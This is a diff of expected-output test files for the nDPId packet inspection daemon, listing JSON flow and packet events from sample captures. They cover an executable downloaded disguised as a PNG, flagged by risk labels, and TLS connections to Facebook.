00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"}
00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}}
01045{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}}
00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569434903040,"flow_last_seen":1569434903040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569434903040,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569434903040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569434903040,"pkt":"IOUqtpPxAAgCHEeuCABFAAA0Bk9AAIAGv+sKCRlluWJXucAtAFB7PMGWAAAAAIACIAAdNgAAAgQFtAEDAwgBAQQC"}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569434903440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1569434903440,"pkt":"AAgCHEeuIOUqtpPxCABFAAAsESIAAIAG9SC5Yle5CgkZZQBQwC0vLgrVezzBl2AS+vAxRwAAAgQFtA=="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569434903440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569434903440,"pkt":"IOUqtpPxAAgCHEeuCABFAAAoBlJAAIAGv\/QKCRlluWJXucAtAFB7PMGXLy4K1lAQ+vBJBAAA"}
00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569434903040,"flow_last_seen":1569434903441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569434903441,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}}
01045{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}}
00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":534,"packets-processed":534,"total-skipped-flows":0,"total-l4-data-len":500597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434972556}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 534/534

30
test/results/facebook.pcap.out
View File

@@ -1,20 +1,20 @@
00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"facebook.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1472393122365}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393122365,"flow_last_seen":1472393122365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393122365,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"}
00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393122365,"flow_last_seen":1472393122365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393122365,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"}
00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}}
01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="}
